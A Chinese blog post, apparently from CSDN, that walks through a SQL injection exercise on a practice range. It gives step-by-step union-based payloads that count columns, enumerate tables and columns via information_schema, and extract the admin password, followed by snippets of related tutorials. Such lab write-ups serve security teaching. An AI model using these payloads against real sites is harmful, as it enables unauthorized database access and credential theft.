靶场实战——SQL注入

已于 2024-09-11 20:02:49 修改
阅读量440 收藏 3
点赞数 4
文章标签: 安全
于 2024-07-25 15:47:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58666006/article/details/140690881
版权

靶场地址:封神台 - 掌控安全在线攻防演练靶场,一个专为网络安全从业人员设计的白帽黑客渗透测试演练平台。 (zkaq.cn)

 

点击查看新闻1可得到如下信息

输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=1 -- - 

 页面有显示,可能注入成功,再次进行测试

输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2 -- -

 此时页面没有内容输入,可以得出结论该sql注入就是简单的数字型 

下面就进行拖库

首先利用order by 来确认列数,从1开始,当从1开始到报错的前一个数字就说明该表有几列

输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 order by 1 -- - 当输入到3时

输入payload:payload:http://pu2lh35s.ia.aqlab.cn/?id=1 order by 3 -- - 

确认列数为两列

然后使用union结合select来确定出输出的内容位于那一列

输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 union select 1,2 LIMIT 1,1 -- -  

确定之后就简单了,先获取数据库名字

输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 union select 1,database() LIMIT 1,1 -- -

输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 union select 1,group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'maoshe' LIMIT 1,1 -- -

group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'maoshe',不懂这句话的意思可以问ai,不是啥难点

输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 union select 1,group_concat(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_NAME = 'admin' and TABLE_SCHEMA='maoshe' LIMIT 1,1 -- -

 输入payload:

http://pu2lh35s.ia.aqlab.cn/?id=1 union select 1,password from admin limit 1,1 -- -

提交

Sun@happy
关注
掌控安全学院SQL注入靶场
qaq517384的博客
11-18 3739
总体没啥难度,也没有啥过滤,拿来复健感觉还不错,最后一个宽字节注入又花了点时间研究了一下
SQL注入靶场搭建
Aquarius_ego的博客
04-01 6181
1.windows下搭建——利用sqli-labs 2.linux下用docker搭建 docker search sqli-labs docker pull docker.io/acgpiano/sqli-labs 拉取sqli镜像 docker run -dt --name sqli-labs -p 8088:80 --rm docer.io/acgpiano/sqli-labs 运行容器,加载镜像 生成一个容器 docker ps -s 查看容器 ifconfig查看ip
sqli-labs漏洞靶场~SQL注入(全网最全详解)
weixin_67832625的博客
08-11 1333
本文主要对sqli-labs靶场的过程及思路做了最清晰的讲解,因为网上都是一些零散教程,今天笔者主打真实,写一篇通俗易懂的文章供大家参考!!!
sql注入靶场
weixin_44382333的博客
09-22 158
盲注: updatexml()函数的理解(图床的设置)
sql注入靶场_sql注入
weixin_26705651的博客
09-21 967
sql注入靶场My first experience with SQL injection was some 20 years ago but is still very relevant today. 我第一次使用SQL注入的经验大约是20年前,但是今天仍然非常重要。 With all the advanced Database access frameworks, features, and...
iwebsec靶场sql注入
果粒程
02-24 1079
iwebsec靶场sql注入
SQL注入--靶场练习
wmr123456001的博客
02-11 2076
SQL注入靶场练习
【小迪安全day13】WEB漏洞——SQL注入之MYSQL注入
RichUee的博客
12-05 1354
MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。
渗透测试——SQL注入
zjdda的博客
05-19 762
sql注入原理及实战
初学Web安全sql注入(二)——报错注入
weixin_47531846的博客
11-20 696
知识补充: 前一篇提到了如何判断字符型与数字型以及字符型的闭合,不过在做sqli-labs靶场时,出现了id=(‘1’),甚至还有id=((‘1’))这样双括号包裹的,在这里笔者也是没想到,不过正常来说,开发人员是不会使用这种的,所以前篇提到的单引号双引号判断法,还是有用的。 其实页面有回显,判断出数字型以及字符型还有闭合,还是相对简单的,下面拿靶场举列 上图,我们将报错信息拿出来分析一下: ''1'' LIMIT 0,1' 将最外面的包裹引号去掉: '1'' LIMIT 0, 不难看出,我们输
SQL注入——渗透day06
qq_62716256的博客
08-12 1006
SQL注入——渗透day06
XSS漏洞(xss_and_mysql_file靶场实战)——渗透day10
qq_62716256的博客
09-07 2063
XSS漏洞(xss_and_mysql_file靶场实战)——day10
SQL注入(php靶场为例)
qq_47632786的博客
02-07 475
一般可用 and 1=1 1=2 /1=3/2-1来判断,当两次输出结果相同时,可判断为字符型注入,若输出结果不同,则为数字型注入。mysql数据库中,information—schema中包含数据库中所有的信息,其中含有tables表,和columns表,两个表中分别包含了所有的表明及列名。上述查询,如上图所示,仅显示一个表名,所以我们需要用 group_concat()确保所有查询信息能放到一行显示出来。③如果是字符型,找到闭合方式,闭合方式多为:’ 、" 、 ’ ) 、 ")。
SQL注入靶场攻击——sqli-labs
最新发布
qq_67812668的博客
08-14 847
概述SQL注入(SQL Injection)是发生在web程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至修改数据库,也就是说,SQL注入就是在爱用户输入的字符串中添加SQL语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的SQL语句就会被数据库服务器误认为是正常的SQL语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。
搭建sql注入靶场
学无止境
05-07 4641
搭建sqli-labs SQL-LABs定义:是一个专业的sql注入练习平台, 适用于GET和POST场景, 第一步:准备工作: 1)安装php版本php5.4 选择指定版本 然后点击“安装” 第二步:下载sqli-labs 并解压 <<sqli-labs-master.zip>> 第三步:将sqli-lab文件 放到www目录下...
靶场实践之SQL注入
Stephen8848的博客
08-14 412
渗透测试的时候使用工具是很简单的,但是要是对技术有追求,还是需要了解得更深入一些,多探索!安装系统自行百度,这里不做过多说明。版本5之后,数据库里有一个默认的库。它里面有三个关键的表,分别是。
墨者学院MySQL--sql注入靶场
weixin_43803070的博客
07-08 1630
这几天做题的时候发现了一个靶场,先做了一个SQL注入,怎么说呢,这个靶场环境还可以,但是个人感觉最后的 key获取,有点脑洞,没有太大的实际意义背离了实际的初衷,不说了直接上wp: 首先找注入点: http://219.153.49.228:40084/new_list.php?id=1‘// id=1的时候返回正常,id=1’的时候返回错误,说明存在sql注入。 http://219.153...
Burpsuite靶场——SQL注入
小林说安全的博客
05-13 4635
Burpsuite靶场——SQL注入漏洞详解,带你了解并从根源上解决SQL注入问题。
一次简单的SQL注入靶场练习
lza20001103的博客
07-24 4138
一次简单的SQL注入靶场练习
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值